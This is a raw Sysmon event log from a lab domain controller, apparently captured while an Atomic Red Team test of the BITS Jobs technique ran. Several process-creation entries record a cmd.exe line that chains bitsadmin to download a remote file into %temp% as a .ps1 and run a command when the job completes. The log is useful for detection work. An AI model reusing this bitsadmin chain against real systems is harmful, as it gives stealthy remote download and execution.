16:33:12.463{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061844Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.463{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061843Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.463{7F8C56E7-4E4F-6063-5500-00000000AF01}38244020C:\Windows\system32\csrss.exe{7F8C56E7-52C8-6063-4701-00000000AF01}3712C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061842Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.463{7F8C56E7-52C8-6063-4301-00000000AF01}43924396C:\Windows\system32\cmd.exe{7F8C56E7-52C8-6063-4701-00000000AF01}3712C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061841Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.467{7F8C56E7-52C8-6063-4701-00000000AF01}3712C:\Windows\System32\bitsadmin.exe7.8.14393.0 (rs1_release.160715-1616)BITS administration utilityMicrosoft® Windows® Operating SystemMicrosoft Corporationbitsadmin.exebitsadmin.exe /resume AtomicBITS C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{7F8C56E7-4E65-6063-912A-070000000000}0x72a912HighMD5=F548717B821860C2B2242367732FE105,SHA256=E1057A20945BCE8F00C0BE5E3DB40C4A98AB33F42F4D2DF919AEDB0EF6651D6E,IMPHASH=CE0EB5030AA7D3C8606F11BBCA0BC912{7F8C56E7-52C8-6063-4301-00000000AF01}4392C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS & bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\bitsadmin3_flag.ps1 & bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe "" & bitsadmin.exe /resume AtomicBITS & timeout 5 & bitsadmin.exe /complete AtomicBITS" 10341000x80000000000000001061840Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.447{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-52C8-6063-4601-00000000AF01}4972C:\Windows\system32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061839Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.447{7F8C56E7-4E3C-6063-1600-00000000AF01}12801520C:\Windows\system32\svchost.exe{7F8C56E7-52C8-6063-4601-00000000AF01}4972C:\Windows\system32\bitsadmin.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061838Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.447{7F8C56E7-4E3C-6063-1600-00000000AF01}12801320C:\Windows\system32\svchost.exe{7F8C56E7-52C8-6063-4601-00000000AF01}4972C:\Windows\system32\bitsadmin.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061837Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.431{7F8C56E7-4F87-6063-CA00-00000000AF01}55846056C:\Windows\system32\conhost.exe{7F8C56E7-52C8-6063-4601-00000000AF01}4972C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061836Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.431{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061835Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.431{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061834Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.431{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061833Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.431{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061832Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.431{7F8C56E7-4E4F-6063-5500-00000000AF01}38244020C:\Windows\system32\csrss.exe{7F8C56E7-52C8-6063-4601-00000000AF01}4972C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061831Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.431{7F8C56E7-52C8-6063-4301-00000000AF01}43924396C:\Windows\system32\cmd.exe{7F8C56E7-52C8-6063-4601-00000000AF01}4972C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061830Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.438{7F8C56E7-52C8-6063-4601-00000000AF01}4972C:\Windows\System32\bitsadmin.exe7.8.14393.0 (rs1_release.160715-1616)BITS administration utilityMicrosoft® Windows® Operating SystemMicrosoft Corporationbitsadmin.exebitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe "" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{7F8C56E7-4E65-6063-912A-070000000000}0x72a912HighMD5=F548717B821860C2B2242367732FE105,SHA256=E1057A20945BCE8F00C0BE5E3DB40C4A98AB33F42F4D2DF919AEDB0EF6651D6E,IMPHASH=CE0EB5030AA7D3C8606F11BBCA0BC912{7F8C56E7-52C8-6063-4301-00000000AF01}4392C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS & bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\bitsadmin3_flag.ps1 & bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe "" & bitsadmin.exe /resume AtomicBITS & timeout 5 & bitsadmin.exe /complete AtomicBITS" 23542300x80000000000000001061829Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.416{7F8C56E7-4E3C-6063-1600-00000000AF01}1280NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\BITD243.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061828Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.416{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-52C8-6063-4501-00000000AF01}4180C:\Windows\system32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061827Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.416{7F8C56E7-4E3C-6063-1600-00000000AF01}12801520C:\Windows\system32\svchost.exe{7F8C56E7-52C8-6063-4501-00000000AF01}4180C:\Windows\system32\bitsadmin.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061826Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.416{7F8C56E7-4E3C-6063-1600-00000000AF01}12801320C:\Windows\system32\svchost.exe{7F8C56E7-52C8-6063-4501-00000000AF01}4180C:\Windows\system32\bitsadmin.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061825Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.400{7F8C56E7-4F87-6063-CA00-00000000AF01}55846056C:\Windows\system32\conhost.exe{7F8C56E7-52C8-6063-4501-00000000AF01}4180C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061824Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.400{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061823Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.400{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061822Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.400{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061821Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.400{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061820Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.400{7F8C56E7-4E4F-6063-5500-00000000AF01}38243840C:\Windows\system32\csrss.exe{7F8C56E7-52C8-6063-4501-00000000AF01}4180C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061819Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.400{7F8C56E7-52C8-6063-4301-00000000AF01}43924396C:\Windows\system32\cmd.exe{7F8C56E7-52C8-6063-4501-00000000AF01}4180C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061818Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.404{7F8C56E7-52C8-6063-4501-00000000AF01}4180C:\Windows\System32\bitsadmin.exe7.8.14393.0 (rs1_release.160715-1616)BITS administration utilityMicrosoft® Windows® Operating SystemMicrosoft Corporationbitsadmin.exebitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Users\ADMINI~1\AppData\Local\Temp\bitsadmin3_flag.ps1 C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{7F8C56E7-4E65-6063-912A-070000000000}0x72a912HighMD5=F548717B821860C2B2242367732FE105,SHA256=E1057A20945BCE8F00C0BE5E3DB40C4A98AB33F42F4D2DF919AEDB0EF6651D6E,IMPHASH=CE0EB5030AA7D3C8606F11BBCA0BC912{7F8C56E7-52C8-6063-4301-00000000AF01}4392C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS & bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\bitsadmin3_flag.ps1 & bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe "" & bitsadmin.exe /resume AtomicBITS & timeout 5 & bitsadmin.exe /complete AtomicBITS" 10341000x80000000000000001061817Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.384{7F8C56E7-4E3C-6063-1600-00000000AF01}12801520C:\Windows\system32\svchost.exe{7F8C56E7-52C8-6063-4401-00000000AF01}4372C:\Windows\system32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\qmgr.dll+2f267|c:\windows\system32\qmgr.dll+2db8f|c:\windows\system32\qmgr.dll+1f9de|c:\windows\system32\qmgr.dll+1fd4c|c:\windows\system32\qmgr.dll+1fb85|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x80000000000000001061816Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 